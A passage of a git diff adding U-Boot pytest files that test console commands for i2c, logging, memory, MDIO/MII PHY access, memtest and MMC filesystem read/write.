expected_response = f"Setting bus to {bus}" + response = u_boot_console.run_command(f"i2c dev {bus}") + assert expected_response in response + expected_response = "Valid chip addresses:" + response = u_boot_console.run_command("i2c probe") + assert expected_response in response + +@pytest.mark.buildconfigspec("cmd_i2c") +def test_i2c_eeprom(u_boot_console): + f = u_boot_console.config.env.get("env__i2c_eeprom_device_test", None) + if not f: + pytest.skip("No I2C eeprom to test!") + + bus = f.get("bus", 0) + if bus < 0: + pytest.fail("No bus specified via env__i2c_eeprom_device_test!") + + addr = f.get("eeprom_addr", -1) + if addr < 0: + pytest.fail("No eeprom address specified via env__i2c_eeprom_device_test!") + + value = f.get("eeprom_val") + if not value: + pytest.fail( + "No eeprom configured value provided via env__i2c_eeprom_device_test!" + ) + + # Enable i2c mux bridge + u_boot_console.run_command("i2c dev %x" % bus) + u_boot_console.run_command("i2c probe") + output = u_boot_console.run_command("i2c md %x 0 5" % addr) + assert value in output + +@pytest.mark.buildconfigspec("cmd_i2c") +def test_i2c_probe_all_buses(u_boot_console): + bus_list, probe = get_i2c_test_env(u_boot_console) + bus = random.choice(bus_list) + expected_response = f"Bus {bus}:" + response = u_boot_console.run_command("i2c bus") + assert expected_response in response + + # Get all the bus list + if probe: + buses = re.findall("Bus (.+?):", response) + bus_list = [int(x) for x in buses] + + for dev in bus_list: + expected_response = f"Setting bus to {dev}" + response = u_boot_console.run_command(f"i2c dev {dev}") + assert expected_response in response + expected_response = "Valid chip addresses:" + response = u_boot_console.run_command("i2c probe") + assert expected_response in response diff --git a/test/py/tests/test_kconfig.py b/test/py/tests/test_kconfig.py new file mode 100644 index 00000000000..0b9e6bc3bd1 --- /dev/null +++ b/test/py/tests/test_kconfig.py @@ -0,0 +1,39 @@ +# SPDX-License-Identifier: GPL-2.0 +# Copyright 2022 Google LLC +# Written by Simon Glass <sjg@chromium.org> + +import pytest + +import u_boot_utils as util + +# This is needed for Azure, since the default '..' directory is not writeable +TMPDIR = '/tmp/test_kconfig' + +@pytest.mark.slow +@pytest.mark.boardspec('sandbox') +def test_kconfig(u_boot_console): + """Test build failures when IF_ENABLED_INT() option is not enabled""" + cons = u_boot_console + + # This detects build errors in test/lib/kconfig.c + out = util.run_and_log( + cons, ['./tools/buildman/buildman', '-m', '--board', 'sandbox', + '-a', 'TEST_KCONFIG', '-o', TMPDIR], ignore_errors=True) + assert 'invalid_use_of_IF_ENABLED_INT' in out + assert 'invalid_use_of_CONFIG_IF_ENABLED_INT' in out + +@pytest.mark.slow +@pytest.mark.boardspec('sandbox_spl') +def test_kconfig_spl(u_boot_console): + """Test build failures when IF_ENABLED_INT() option is not enabled""" + cons = u_boot_console + + # This detects build errors in test/lib/kconfig_spl.c + out = util.run_and_log( + cons, ['./tools/buildman/buildman', '-m', '--board', 'sandbox_spl', + '-a', 'TEST_KCONFIG', '-o', TMPDIR], ignore_errors=True) + assert 'invalid_use_of_IF_ENABLED_INT' in out + + # There is no CONFIG_SPL_TEST_KCONFIG, so the CONFIG_IF_ENABLED_INT() + # line should not generate an error + assert 'invalid_use_of_CONFIG_IF_ENABLED_INT' not in out diff --git a/test/py/tests/test_log.py b/test/py/tests/test_log.py new file mode 100644 index 00000000000..140dcb9aa2b --- /dev/null +++ b/test/py/tests/test_log.py @@ -0,0 +1,48 @@ +# SPDX-License-Identifier: GPL-2.0+ +# Copyright (c) 2016, Google Inc. +# +# U-Boot Verified Boot Test + +""" +This tests U-Boot logging. It uses the 'log test' command with various options +and checks that the output is correct. +""" + +import pytest + +@pytest.mark.buildconfigspec('cmd_log') +def test_log_format(u_boot_console): + """Test the 'log format' and 'log rec' commands""" + def run_with_format(fmt, expected_output): + """Set up the log format and then write a log record + + Args: + fmt: Format to use for 'log format' + expected_output: Expected output from the 'log rec' command + """ + output = cons.run_command('log format %s' % fmt) + assert output == '' + output = cons.run_command('log rec arch notice file.c 123 func msg') + assert output == expected_output + + cons = u_boot_console + with cons.log.section('format'): + run_with_format('all', 'NOTICE.arch,file.c:123-func() msg') + output = cons.run_command('log format') + assert output == 'Log format: clFLfm' + + run_with_format('fm', 'func() msg') + run_with_format('clfm', 'NOTICE.arch,func() msg') + run_with_format('FLfm', 'file.c:123-func() msg') + run_with_format('lm', 'NOTICE. msg') + run_with_format('m', 'msg') + +@pytest.mark.buildconfigspec('debug_uart') +@pytest.mark.boardspec('sandbox') +def test_log_dropped(u_boot_console): + """Test dropped 'log' message when debug_uart is activated""" + + cons = u_boot_console + cons.restart_uboot() + output = cons.get_spawn_output().replace('\r', '') + assert (not 'debug: main' in output) diff --git a/test/py/tests/test_lsblk.py b/test/py/tests/test_lsblk.py new file mode 100644 index 00000000000..a719a48e6ee --- /dev/null +++ b/test/py/tests/test_lsblk.py @@ -0,0 +1,14 @@ +# SPDX-License-Identifier: GPL-2.0+ +# Copyright (C) 2020 +# Niel Fourie, DENX Software Engineering, lusus@denx.de + +import pytest + +@pytest.mark.boardspec('sandbox') +@pytest.mark.buildconfigspec('blk') +@pytest.mark.buildconfigspec('cmd_lsblk') +def test_lsblk(u_boot_console): + """Test that `lsblk` prints a result which includes `host`.""" + output = u_boot_console.run_command('lsblk') + assert "Block Driver" in output + assert "sandbox_host_blk" in output diff --git a/test/py/tests/test_md.py b/test/py/tests/test_md.py new file mode 100644 index 00000000000..83e3c546f4a --- /dev/null +++ b/test/py/tests/test_md.py @@ -0,0 +1,36 @@ +# SPDX-License-Identifier: GPL-2.0 +# Copyright (c) 2015 Stephen Warren +# Copyright (c) 2015-2016, NVIDIA CORPORATION. All rights reserved. + +import pytest +import u_boot_utils + +@pytest.mark.buildconfigspec('cmd_memory') +def test_md(u_boot_console): + """Test that md reads memory as expected, and that memory can be modified + using the mw command.""" + + ram_base = u_boot_utils.find_ram_base(u_boot_console) + addr = '%08x' % ram_base + val = 'a5f09876' + expected_response = addr + ': ' + val + u_boot_console.run_command('mw ' + addr + ' 0 10') + response = u_boot_console.run_command('md ' + addr + ' 10') + assert(not (expected_response in response)) + u_boot_console.run_command('mw ' + addr + ' ' + val) + response = u_boot_console.run_command('md ' + addr + ' 10') + assert(expected_response in response) + +@pytest.mark.buildconfigspec('cmd_memory') +def test_md_repeat(u_boot_console): + """Test command repeat (via executing an empty command) operates correctly + for "md"; the command must repeat and dump an incrementing address.""" + + ram_base = u_boot_utils.find_ram_base(u_boot_console) + addr_base = '%08x' % ram_base + words = 0x10 + addr_repeat = '%08x' % (ram_base + (words * 4)) + u_boot_console.run_command('md %s %x' % (addr_base, words)) + response = u_boot_console.run_command('') + expected_response = addr_repeat + ': ' + assert(expected_response in response) diff --git a/test/py/tests/test_mdio.py b/test/py/tests/test_mdio.py new file mode 100644 index 00000000000..89711e70b55 --- /dev/null +++ b/test/py/tests/test_mdio.py @@ -0,0 +1,79 @@ +# SPDX-License-Identifier: GPL-2.0 +# (C) Copyright 2023, Advanced Micro Devices, Inc. + +import pytest +import re + +""" +Note: This test relies on boardenv_* containing configuration values to define +the PHY device info including the device name, address, register address/value +and write data value. This test will be automatically skipped without this. + +For example: + +# Setup env__mdio_util_test to set the PHY address, device names, register +# address, register address value, and write data value to test mdio commands. +# Test will be skipped if env_mdio_util_test is not set +env__mdio_util_test = { + "eth0": {"phy_addr": 0xc, "device_name": "TI DP83867", "reg": 0, + "reg_val": 0x1000, "write_val": 0x100}, + "eth1": {"phy_addr": 0xa0, "device_name": "TI DP83867", "reg": 1, + "reg_val": 0x2000, "write_val": 0x100}, +} +""" + +def get_mdio_test_env(u_boot_console): + f = u_boot_console.config.env.get("env__mdio_util_test", None) + if not f or len(f) == 0: + pytest.skip("No PHY device to test!") + else: + return f + +@pytest.mark.buildconfigspec("cmd_mii") +@pytest.mark.buildconfigspec("phylib") +def test_mdio_list(u_boot_console): + f = get_mdio_test_env(u_boot_console) + output = u_boot_console.run_command("mdio list") + for dev, val in f.items(): + phy_addr = val.get("phy_addr") + dev_name = val.get("device_name") + + assert f"{phy_addr:x} -" in output + assert dev_name in output + +@pytest.mark.buildconfigspec("cmd_mii") +@pytest.mark.buildconfigspec("phylib") +def test_mdio_read(u_boot_console): + f = get_mdio_test_env(u_boot_console) + output = u_boot_console.run_command("mdio list") + for dev, val in f.items(): + phy_addr = hex(val.get("phy_addr")) + dev_name = val.get("device_name") + reg = hex(val.get("reg")) + reg_val = hex(val.get("reg_val")) + + output = u_boot_console.run_command(f"mdio read {phy_addr} {reg}") + assert f"PHY at address {int(phy_addr, 16):x}:" in output + assert f"{int(reg, 16):x} - {reg_val}" in output + +@pytest.mark.buildconfigspec("cmd_mii") +@pytest.mark.buildconfigspec("phylib") +def test_mdio_write(u_boot_console): + f = get_mdio_test_env(u_boot_console) + output = u_boot_console.run_command("mdio list") + for dev, val in f.items(): + phy_addr = hex(val.get("phy_addr")) + dev_name = val.get("device_name") + reg = hex(val.get("reg")) + reg_val = hex(val.get("reg_val")) + wr_val = hex(val.get("write_val")) + + u_boot_console.run_command(f"mdio write {phy_addr} {reg} {wr_val}") + output = u_boot_console.run_command(f"mdio read {phy_addr} {reg}") + assert f"PHY at address {int(phy_addr, 16):x}:" in output + assert f"{int(reg, 16):x} - {wr_val}" in output + + u_boot_console.run_command(f"mdio write {phy_addr} {reg} {reg_val}") + output = u_boot_console.run_command(f"mdio read {phy_addr} {reg}") + assert f"PHY at address {int(phy_addr, 16):x}:" in output + assert f"{int(reg, 16):x} - {reg_val}" in output diff --git a/test/py/tests/test_memtest.py b/test/py/tests/test_memtest.py new file mode 100644 index 00000000000..0618d96f1be --- /dev/null +++ b/test/py/tests/test_memtest.py @@ -0,0 +1,68 @@ +# SPDX-License-Identifier: GPL-2.0 +# (C) Copyright 2023, Advanced Micro Devices, Inc. + +import pytest + +""" +Note: This test relies on boardenv_* containing configuration values to define +the memory test parameters such as start address, memory size, pattern, +iterations and timeout. This test will be automatically skipped without this. + +For example: + +# Setup env__memtest to set the start address of the memory range, size of the +# memory range to test from starting address, pattern to be written to memory, +# number of test iterations, and expected time to complete the test of mtest +# command. start address, size, and pattern parameters value should be in hex +# and rest of the params value should be integer. +env__memtest = { + 'start_addr': 0x0, + 'size': 0x1000, + 'pattern': 0x0, + 'iteration': 16, + 'timeout': 50000, +} +""" + +def get_memtest_env(u_boot_console): + f = u_boot_console.config.env.get("env__memtest", None) + if not f: + pytest.skip("memtest is not enabled!") + else: + start = f.get("start_addr", 0x0) + size = f.get("size", 0x1000) + pattern = f.get("pattern", 0x0) + iteration = f.get("iteration", 2) + timeout = f.get("timeout", 50000) + end = hex(int(start) + int(size)) + return start, end, pattern, iteration, timeout + +@pytest.mark.buildconfigspec("cmd_memtest") +def test_memtest_negative(u_boot_console): + """Negative testcase where end address is smaller than starting address and + pattern is invalid.""" + start, end, pattern, iteration, timeout = get_memtest_env(u_boot_console) + expected_response = "Refusing to do empty test" + response = u_boot_console.run_command( + f"mtest 2000 1000 {pattern} {hex(iteration)}" + ) + assert expected_response in response + output = u_boot_console.run_command("echo $?") + assert not output.endswith("0") + u_boot_console.run_command(f"mtest {start} {end} 'xyz' {hex(iteration)}") + output = u_boot_console.run_command("echo $?") + assert not output.endswith("0") + +@pytest.mark.buildconfigspec("cmd_memtest") +def test_memtest_ddr(u_boot_console): + """Test that md reads memory as expected, and that memory can be modified + using the mw command.""" + start, end, pattern, iteration, timeout = get_memtest_env(u_boot_console) + expected_response = f"Tested {str(iteration)} iteration(s) with 0 errors." + with u_boot_console.temporary_timeout(timeout): + response = u_boot_console.run_command( + f"mtest {start} {end} {pattern} {hex(iteration)}" + ) + assert expected_response in response + output = u_boot_console.run_command("echo $?") + assert output.endswith("0") diff --git a/test/py/tests/test_mii.py b/test/py/tests/test_mii.py new file mode 100644 index 00000000000..7b6816d1089 --- /dev/null +++ b/test/py/tests/test_mii.py @@ -0,0 +1,92 @@ +# SPDX-License-Identifier: GPL-2.0 +# (C) Copyright 2023, Advanced Micro Devices, Inc. + +import pytest +import re + +""" +Note: This test doesn't rely on boardenv_* configuration value but they can +change test behavior. + +For example: + +# Setup env__mii_deive_test_skip to True if tests with ethernet PHY devices +# should be skipped. For example: Missing PHY device +env__mii_device_test_skip = True + +# Setup env__mii_device_test to set the MII device names. Test will be skipped +# if env_mii_device_test is not set +env__mii_device_test = { + 'device_list': ['eth0', 'eth1'], +} +""" + +@pytest.mark.buildconfigspec("cmd_mii") +def test_mii_info(u_boot_console): + if u_boot_console.config.env.get("env__mii_device_test_skip", False): + pytest.skip("MII device test is not enabled!") + expected_output = "PHY" + output = u_boot_console.run_command("mii info") + if not re.search(r"PHY (.+?):", output): + pytest.skip("PHY device does not exist!") + assert expected_output in output + +@pytest.mark.buildconfigspec("cmd_mii") +def test_mii_list(u_boot_console): + if u_boot_console.config.env.get("env__mii_device_test_skip", False): + pytest.skip("MII device test is not enabled!") + + f = u_boot_console.config.env.get("env__mii_device_test", None) + if not f: + pytest.skip("No MII device to test!") + + dev_list = f.get("device_list") + if not dev_list: + pytest.fail("No MII device list provided via env__mii_device_test!") + + expected_output = "Current device" + output = u_boot_console.run_command("mii device") + mii_devices = ( + re.search(r"MII devices: '(.+)'", output).groups()[0].replace("'", "").split() + ) + + assert len([x for x in dev_list if x in mii_devices]) == len(dev_list) + assert expected_output in output + +@pytest.mark.buildconfigspec("cmd_mii") +def test_mii_set_device(u_boot_console): + test_mii_list(u_boot_console) + f = u_boot_console.config.env.get("env__mii_device_test", None) + dev_list = f.get("device_list") + output = u_boot_console.run_command("mii device") + current_dev = re.search(r"Current device: '(.+?)'", output).groups()[0] + + for dev in dev_list: + u_boot_console.run_command(f"mii device {dev}") + output = u_boot_console.run_command("echo $?") + assert output.endswith("0") + + u_boot_console.run_command(f"mii device {current_dev}") + output = u_boot_console.run_command("mii device") + dev = re.search(r"Current device: '(.+?)'", output).groups()[0] + assert current_dev == dev + +@pytest.mark.buildconfigspec("cmd_mii") +def test_mii_read(u_boot_console): + test_mii_list(u_boot_console) + output = u_boot_console.run_command("mii info") + eth_addr = hex(int(re.search(r"PHY (.+?):", output).groups()[0], 16)) + u_boot_console.run_command(f"mii read {eth_addr} 0") + output = u_boot_console.run_command("echo $?") + assert output.endswith("0") + +@pytest.mark.buildconfigspec("cmd_mii") +def test_mii_dump(u_boot_console): + test_mii_list(u_boot_console) + expected_response = "PHY control register" + output = u_boot_console.run_command("mii info") + eth_addr = hex(int(re.search(r"PHY (.+?):", output).groups()[0], 16)) + response = u_boot_console.run_command(f"mii dump {eth_addr} 0") + assert expected_response in response + output = u_boot_console.run_command("echo $?") + assert output.endswith("0") diff --git a/test/py/tests/test_mmc.py b/test/py/tests/test_mmc.py new file mode 100644 index 00000000000..a96c4e8fd89 --- /dev/null +++ b/test/py/tests/test_mmc.py @@ -0,0 +1,671 @@ +# SPDX-License-Identifier: GPL-2.0 +# (C) Copyright 2023, Advanced Micro Devices, Inc. + +import pytest +import random +import re +import u_boot_utils + +""" +Note: This test doesn't rely on boardenv_* configuration values but it can +change the test behavior. To test MMC file system cases (fat32, ext2, ext4), +MMC device should be formatted and valid partitions should be created for +different file system, otherwise it may leads to failure. This test will be +skipped if the MMC device is not detected. + +For example: + +# Setup env__mmc_device_test_skip to not skipping the test. By default, its +# value is set to True. Set it to False to run all tests for MMC device. +env__mmc_device_test_skip = False +""" + +mmc_set_up = False +controllers = 0 +devices = {} + +def setup_mmc(u_boot_console): + if u_boot_console.config.env.get('env__mmc_device_test_skip', True): + pytest.skip('MMC device test is not enabled') + +@pytest.mark.buildconfigspec('cmd_mmc') +def test_mmc_list(u_boot_console): + setup_mmc(u_boot_console) + output = u_boot_console.run_command('mmc list') + if 'No MMC device available' in output: + pytest.skip('No SD/MMC/eMMC controller available') + + if 'Card did not respond to voltage select' in output: + pytest.skip('No SD/MMC card present') + + array = output.split() + global devices + global controllers + controllers = int(len(array) / 2) + for x in range(0, controllers): + y = x * 2 + devices[x] = {} + devices[x]['name'] = array[y] + + global mmc_set_up + mmc_set_up = True + +@pytest.mark.buildconfigspec('cmd_mmc') +def test_mmc_dev(u_boot_console): + if not mmc_set_up: + pytest.skip('No SD/MMC/eMMC controller available') + + fail = 0 + for x in range(0, controllers): + devices[x]['detected'] = 'yes' + output = u_boot_console.run_command('mmc dev %d' % x) + + # Some sort of switch here + if 'Card did not respond to voltage select' in output: + fail = 1 + devices[x]['detected'] = 'no' + + if 'no mmc device at slot' in output: + devices[x]['detected'] = 'no' + + if 'MMC: no card present' in output: + devices[x]['detected'] = 'no' + + if fail: + pytest.fail('Card not present') + +@pytest.mark.buildconfigspec('cmd_mmc') +def test_mmcinfo(u_boot_console): + if not mmc_set_up: + pytest.skip('No SD/MMC/eMMC controller available') + + for x in range(0, controllers): + if devices[x]['detected'] == 'yes': + u_boot_console.run_command('mmc dev %d' % x) + output = u_boot_console.run_command('mmcinfo') + if 'busy timeout' in output: + pytest.skip('No SD/MMC/eMMC device present') + + obj = re.search(r'Capacity: (\d+|\d+[\.]?\d)', output) + try: + capacity = float(obj.groups()[0]) + print(capacity) + devices[x]['capacity'] = capacity + print('Capacity of dev %d is: %g GiB' % (x, capacity)) + except ValueError: + pytest.fail('MMC capacity not recognized') + +@pytest.mark.buildconfigspec('cmd_mmc') +def test_mmc_info(u_boot_console): + if not mmc_set_up: + pytest.skip('No SD/MMC/eMMC controller available') + + for x in range(0, controllers): + if devices[x]['detected'] == 'yes': + u_boot_console.run_command('mmc dev %d' % x) + + output = u_boot_console.run_command('mmc info') + + obj = re.search(r'Capacity: (\d+|\d+[\.]?\d)', output) + try: + capacity = float(obj.groups()[0]) + print(capacity) + if devices[x]['capacity'] != capacity: + pytest.fail("MMC capacity doesn't match mmcinfo") + + except ValueError: + pytest.fail('MMC capacity not recognized') + +@pytest.mark.buildconfigspec('cmd_mmc') +def test_mmc_rescan(u_boot_console): + if not mmc_set_up: + pytest.skip('No SD/MMC/eMMC controller available') + + if not devices: + pytest.skip('No devices detected') + + for x in range(0, controllers): + if devices[x]['detected'] == 'yes': + u_boot_console.run_command('mmc dev %d' % x) + output = u_boot_console.run_command('mmc rescan') + if output: + pytest.fail('mmc rescan has something to check') + output = u_boot_console.run_command('echo $?') + assert output.endswith('0') + +@pytest.mark.buildconfigspec('cmd_mmc') +def test_mmc_part(u_boot_console): + if not mmc_set_up: + pytest.skip('No SD/MMC/eMMC controller available') + + if not devices: + pytest.skip('No devices detected') + + for x in range(0, controllers): + if devices[x]['detected'] == 'yes': + u_boot_console.run_command('mmc dev %d' % x) + output = u_boot_console.run_command('mmc part') + + lines = output.split('\n') + part_fat = [] + part_ext = [] + for line in lines: + obj = re.search( + r'(\d)\s+\d+\s+\d+\s+\w+\d+\w+-\d+\s+(\d+\w+)', line) + if obj: + part_id = int(obj.groups()[0]) + part_type = obj.groups()[1] + print('part_id:%d, part_type:%s' % (part_id, part_type)) + + if part_type in ['0c', '0b', '0e']: + print('Fat detected') + part_fat.append(part_id) + elif part_type == '83': + print('ext detected') + part_ext.append(part_id) + else: + pytest.fail('Unsupported Filesystem on device %d' % x) + devices[x]['ext4'] = part_ext + devices[x]['ext2'] = part_ext + devices[x]['fat'] = part_fat + + if not part_ext and not part_fat: + pytest.fail('No partition detected on device %d' % x) + +@pytest.mark.buildconfigspec('cmd_mmc') +@pytest.mark.buildconfigspec('cmd_fat') +def test_mmc_fatls_fatinfo(u_boot_console): + if not mmc_set_up: + pytest.skip('No SD/MMC/eMMC controller available') + + if not devices: + pytest.skip('No devices detected') + + part_detect = 0 + fs = 'fat' + for x in range(0, controllers): + if devices[x]['detected'] == 'yes': + u_boot_console.run_command('mmc dev %d' % x) + try: + partitions = devices[x][fs] + except: + print('No %s table on this device' % fs.upper()) + continue + + for part in partitions: + output = u_boot_console.run_command( + 'fatls mmc %d:%s' % (x, part)) + if 'Unrecognized filesystem type' in output: + partitions.remove(part) + pytest.fail('Unrecognized filesystem') + + if not re.search(r'\d file\(s\), \d dir\(s\)', output): + pytest.fail('%s read failed on device %d' % (fs.upper, x)) + output = u_boot_console.run_command( + 'fatinfo mmc %d:%s' % (x, part)) + string = 'Filesystem: %s' % fs.upper + if re.search(string, output): + pytest.fail('%s FS failed on device %d' % (fs.upper(), x)) + part_detect = 1 + + if not part_detect: + pytest.skip('No %s partition detected' % fs.upper()) + + +@pytest.mark.buildconfigspec('cmd_mmc') +@pytest.mark.buildconfigspec('cmd_fat') +@pytest.mark.buildconfigspec('cmd_memory') +def test_mmc_fatload_fatwrite(u_boot_console): + if not mmc_set_up: + pytest.skip('No SD/MMC/eMMC controller available') + + if not devices: + pytest.skip('No devices detected') + + part_detect = 0 + fs = 'fat' + for x in range(0, controllers): + if devices[x]['detected'] == 'yes': + u_boot_console.run_command('mmc dev %d' % x) + try: + partitions = devices[x][fs] + except: + print('No %s table on this device' % fs.upper()) + continue + + for part in partitions: + part_detect = 1 + addr = u_boot_utils.find_ram_base(u_boot_console) + devices[x]['addr_%d' % part] = addr + size = random.randint(4, 1 * 1024 * 1024) + devices[x]['size_%d' % part] = size + # count CRC32 + output = u_boot_console.run_command('crc32 %x %x' % (addr, size)) + m = re.search('==> (.+?)', output) + if not m: + pytest.fail('CRC32 failed') + expected_crc32 = m.group(1) + devices[x]['expected_crc32_%d' % part] = expected_crc32 + # do write + file = '%s_%d' % ('uboot_test', size) + devices[x]['file_%d' % part] = file + output = u_boot_console.run_command( + '%swrite mmc %d:%s %x %s %x' % (fs, x, part, addr, file, size) + ) + assert 'Unable to write' not in output + assert 'Error' not in output + assert 'overflow' not in output + expected_text = '%d bytes written' % size + assert expected_text in output + + alignment = int( + u_boot_console.config.buildconfig.get( + 'config_sys_cacheline_size', 128 + ) + ) + offset = random.randrange(alignment, 1024, alignment) + output = u_boot_console.run_command( + '%sload mmc %d:%s %x %s' % (fs, x, part, addr + offset, file) + ) + assert 'Invalid FAT entry' not in output + assert 'Unable to read file' not in output + assert 'Misaligned buffer address' not in output + expected_text = '%d bytes read' % size + assert expected_text in output + + output = u_boot_console.run_command( + 'crc32 %x $filesize' % (addr + offset) + ) + assert expected_crc32 in output + + if not part_detect: + pytest.skip('No %s partition detected' % fs.upper()) + +@pytest.mark.buildconfigspec('cmd_mmc') +@pytest.mark.buildconfigspec('cmd_ext4') +def test_mmc_ext4ls(u_boot_console): + if not mmc_set_up: + pytest.skip('No SD/MMC/eMMC controller available') + + if not devices: + pytest.skip('No devices detected') + + part_detect = 0 + fs = 'ext4' + for x in range(0, controllers): + if devices[x]['detected'] == 'yes': + try: + partitions = devices[x][fs] + except: + print('No %s table on this device' % fs.upper()) + continue + + u_boot_console.run_command('mmc dev %d' % x) + for part in partitions: + output = u_boot_console.run_command('%sls mmc %d:%s' % (fs, x, part)) + if 'Unrecognized filesystem type' in output: + partitions.remove(part) + pytest.fail('Unrecognized filesystem') + part_detect = 1 + + if not part_detect: + pytest.skip('No %s partition detected' % fs.upper()) + +@pytest.mark.buildconfigspec('cmd_mmc') +@pytest.mark.buildconfigspec('cmd_ext4') +@pytest.mark.buildconfigspec('ext4_write') +@pytest.mark.buildconfigspec('cmd_memory') +def test_mmc_ext4load_ext4write(u_boot_console): + if not mmc_set_up: + pytest.skip('No SD/MMC/eMMC controller available') + + if not devices: + pytest.skip('No devices detected') + + part_detect = 0 + fs = 'ext4' + for x in range(0, controllers): + if devices[x]['detected'] == 'yes': + u_boot_console.run_command('mmc dev %d' % x) + try: + partitions = devices[x][fs] + except: + print('No %s table on this device' % fs.upper()) + continue + + for part in partitions: + part_detect = 1 + addr = u_boot_utils.find_ram_base(u_boot_console) + devices[x]['addr_%d' % part] = addr + size = random.randint(4, 1 * 1024 * 1024) + devices[x]['size_%d' % part] = size + # count CRC32 + output = u_boot_console.run_command('crc32 %x %x' % (addr, size)) + m = re.search('==> (.+?)', output) + if not m: + pytest.fail('CRC32 failed') + expected_crc32 = m.group(1) + devices[x]['expected_crc32_%d' % part] = expected_crc32 + # do write + + file = '%s_%d' % ('uboot_test', size) + devices[x]['file_%d' % part] = file + output = u_boot_console.run_command( + '%swrite mmc %d:%s %x /%s %x' % (fs, x, part, addr, file, size) + ) + assert 'Unable to write' not in output + assert 'Error' not in output + assert 'overflow' not in output + expected_text = '%d bytes written' % size + assert expected_text in output + + offset = random.randrange(128, 1024, 128) + output = u_boot_console.run_command( + '%sload mmc %d:%s %x /%s' % (fs, x, part, addr + offset, file) + ) + expected_text = '%d bytes read' % size + assert expected_text in output + + output = u_boot_console.run_command( + 'crc32 %x $filesize' % (addr + offset) + ) + assert expected_crc32 in output + + if not part_detect: + pytest.skip('No %s partition detected' % fs.upper()) + +@pytest.mark.buildconfigspec('cmd_mmc') +@pytest.mark.buildconfigspec('cmd_ext2') +def test_mmc_ext2ls(u_boot_console): + if not mmc_set_up: + pytest.skip('No SD/MMC/eMMC controller available') + + if not devices: + pytest.skip('No devices detected') + + part_detect = 0 + fs = 'ext2' + for x in range(0, controllers): + if devices[x]['detected'] == 'yes': + u_boot_console.run_command('mmc dev %d' % x) + try: + partitions = devices[x][fs] + except: + print('No %s table on this device' % fs.upper()) + continue + + for part in partitions: + part_detect = 1 + output = u_boot_console.run_command('%sls mmc %d:%s' % (fs, x, part)) + if 'Unrecognized filesystem type' in output: + partitions.remove(part) + pytest.fail('Unrecognized filesystem') + part_detect = 1 + + if not part_detect: + pytest.skip('No %s partition detected' % fs.upper()) + +@pytest.mark.buildconfigspec('cmd_mmc') +@pytest.mark.buildconfigspec('cmd_ext2') +@pytest.mark.buildconfigspec('cmd_ext4') +@pytest.mark.buildconfigspec('ext4_write') +@pytest.mark.buildconfigspec('cmd_memory') +def test_mmc_ext2load(u_boot_console): + if not mmc_set_up: + pytest.skip('No SD/MMC/eMMC controller available') + + if not devices: + pytest.skip('No devices detected') + + part_detect = 0 + fs = 'ext2' + for x in range(0, controllers): + if devices[x]['detected'] == 'yes': + u_boot_console.run_command('mmc dev %d' % x) + try: + partitions = devices[x][fs] + except: + print('No %s table on this device' % fs.upper()) + continue + + for part in partitions: + part_detect = 1 + addr = devices[x]['addr_%d' % part] + size = devices[x]['size_%d' % part] + expected_crc32 = devices[x]['expected_crc32_%d' % part] + file = devices[x]['file_%d' % part] + + offset = random.randrange(128, 1024, 128) + output = u_boot_console.run_command( + '%sload mmc %d:%s %x /%s' % (fs, x, part, addr + offset, file) + ) + expected_text = '%d bytes read' % size + assert expected_text in output + + output = u_boot_console.run_command( + 'crc32 %x $filesize' % (addr + offset) + ) + assert expected_crc32 in output + + if not part_detect: + pytest.skip('No %s partition detected' % fs.upper()) + +@pytest.mark.buildconfigspec('cmd_mmc') +@pytest.mark.buildconfigspec('cmd_fs_generic') +def test_mmc_ls(u_boot_console): + if not mmc_set_up: + pytest.skip('No SD/MMC/eMMC controller available') + + if not devices: + pytest.skip('No devices detected') + + part_detect = 0 + for x in range(0, controllers): + if devices[x]['detected'] == 'yes': + u_boot_console.run_command('mmc dev %d' % x) + for fs in ['fat', 'ext4']: + try: + partitions = devices[x][fs] + except: + print('No %s table on this device' % fs.upper()) + continue + + for part in partitions: + part_detect = 1 + output = u_boot_console.run_command('ls mmc %d:%s' % (x, part)) + if re.search(r'No \w+ table on this device', output): + pytest.fail( + '%s: Partition table not found %d' % (fs.upper(), x) + ) + + if not part_detect: + pytest.skip('No partition detected') + +@pytest.mark.buildconfigspec('cmd_mmc') +@pytest.mark.buildconfigspec('cmd_fs_generic') +def test_mmc_load(u_boot_console): + if not mmc_set_up: + pytest.skip('No SD/MMC/eMMC controller available') + + if not devices: + pytest.skip('No devices detected') + + part_detect = 0 + for x in range(0, controllers): + if devices[x]['detected'] == 'yes': + u_boot_console.run_command('mmc dev %d' % x) + for fs in ['fat', 'ext4']: + try: + partitions = devices[x][fs] + except: + print('No %s table on this device' % fs.upper()) + continue + + for part in partitions: + part_detect = 1 + addr = devices[x]['addr_%d' % part] + size = devices[x]['size_%d' % part] + expected_crc32 = devices[x]['expected_crc32_%d' % part] + file = devices[x]['file_%d' % part] + + offset = random.randrange(128, 1024, 128) + output = u_boot_console.run_command( + 'load mmc %d:%s %x /%s' % (x, part, addr + offset, file) + ) + expected_text = '%d bytes read' % size + assert expected_text in output + + output = u_boot_console.run_command( + 'crc32 %x $filesize' % (addr + offset) + ) + assert expected_crc32 in output + + if not part_detect: + pytest.skip('No partition detected') + +@pytest.mark.buildconfigspec('cmd_mmc') +@pytest.mark.buildconfigspec('cmd_fs_generic') +def test_mmc_save(u_boot_console): + if not mmc_set_up: + pytest.skip('No SD/MMC/eMMC controller available') + + if not devices: + pytest.skip('No devices detected') + + part_detect = 0 + for x in range(0, controllers): + if devices[x]['detected'] == 'yes': + u_boot_console.run_command('mmc dev %d' % x) + for fs in ['fat', 'ext4']: + try: + partitions = devices[x][fs] + except: + print('No %s table on this device' % fs.upper()) + continue + + for part in partitions: + part_detect = 1 + addr = devices[x]['addr_%d' % part] + size = 0 + file = devices[x]['file_%d' % part] + + offset = random.randrange(128, 1024, 128) + output = u_boot_console.run_command( + 'save mmc %d:%s %x /%s %d' + % (x, part, addr + offset, file, size) + ) + expected_text = '%d bytes written' % size + assert expected_text in output + + if not part_detect: + pytest.skip('No partition detected') + +@pytest.mark.buildconfigspec('cmd_mmc') +@pytest.mark.buildconfigspec('cmd_fat') +@pytest.mark.buildconfigspec('cmd_memory') +def test_mmc_fat_read_write_files(u_boot_console): + test_mmc_list(u_boot_console) + test_mmc_dev(u_boot_console) + test_mmcinfo(u_boot_console) + test_mmc_part(u_boot_console) + if not mmc_set_up: + pytest.skip('No SD/MMC/eMMC controller available') + + if not devices: + pytest.skip('No devices detected') + + part_detect = 0 + fs = 'fat' + + # Number of files to be written/read in MMC card + num_files = 100 + + for x in range(0, controllers): + if devices[x]['detected'] == 'yes': + u_boot_console.run_command('mmc dev %d' % x) + try: + partitions = 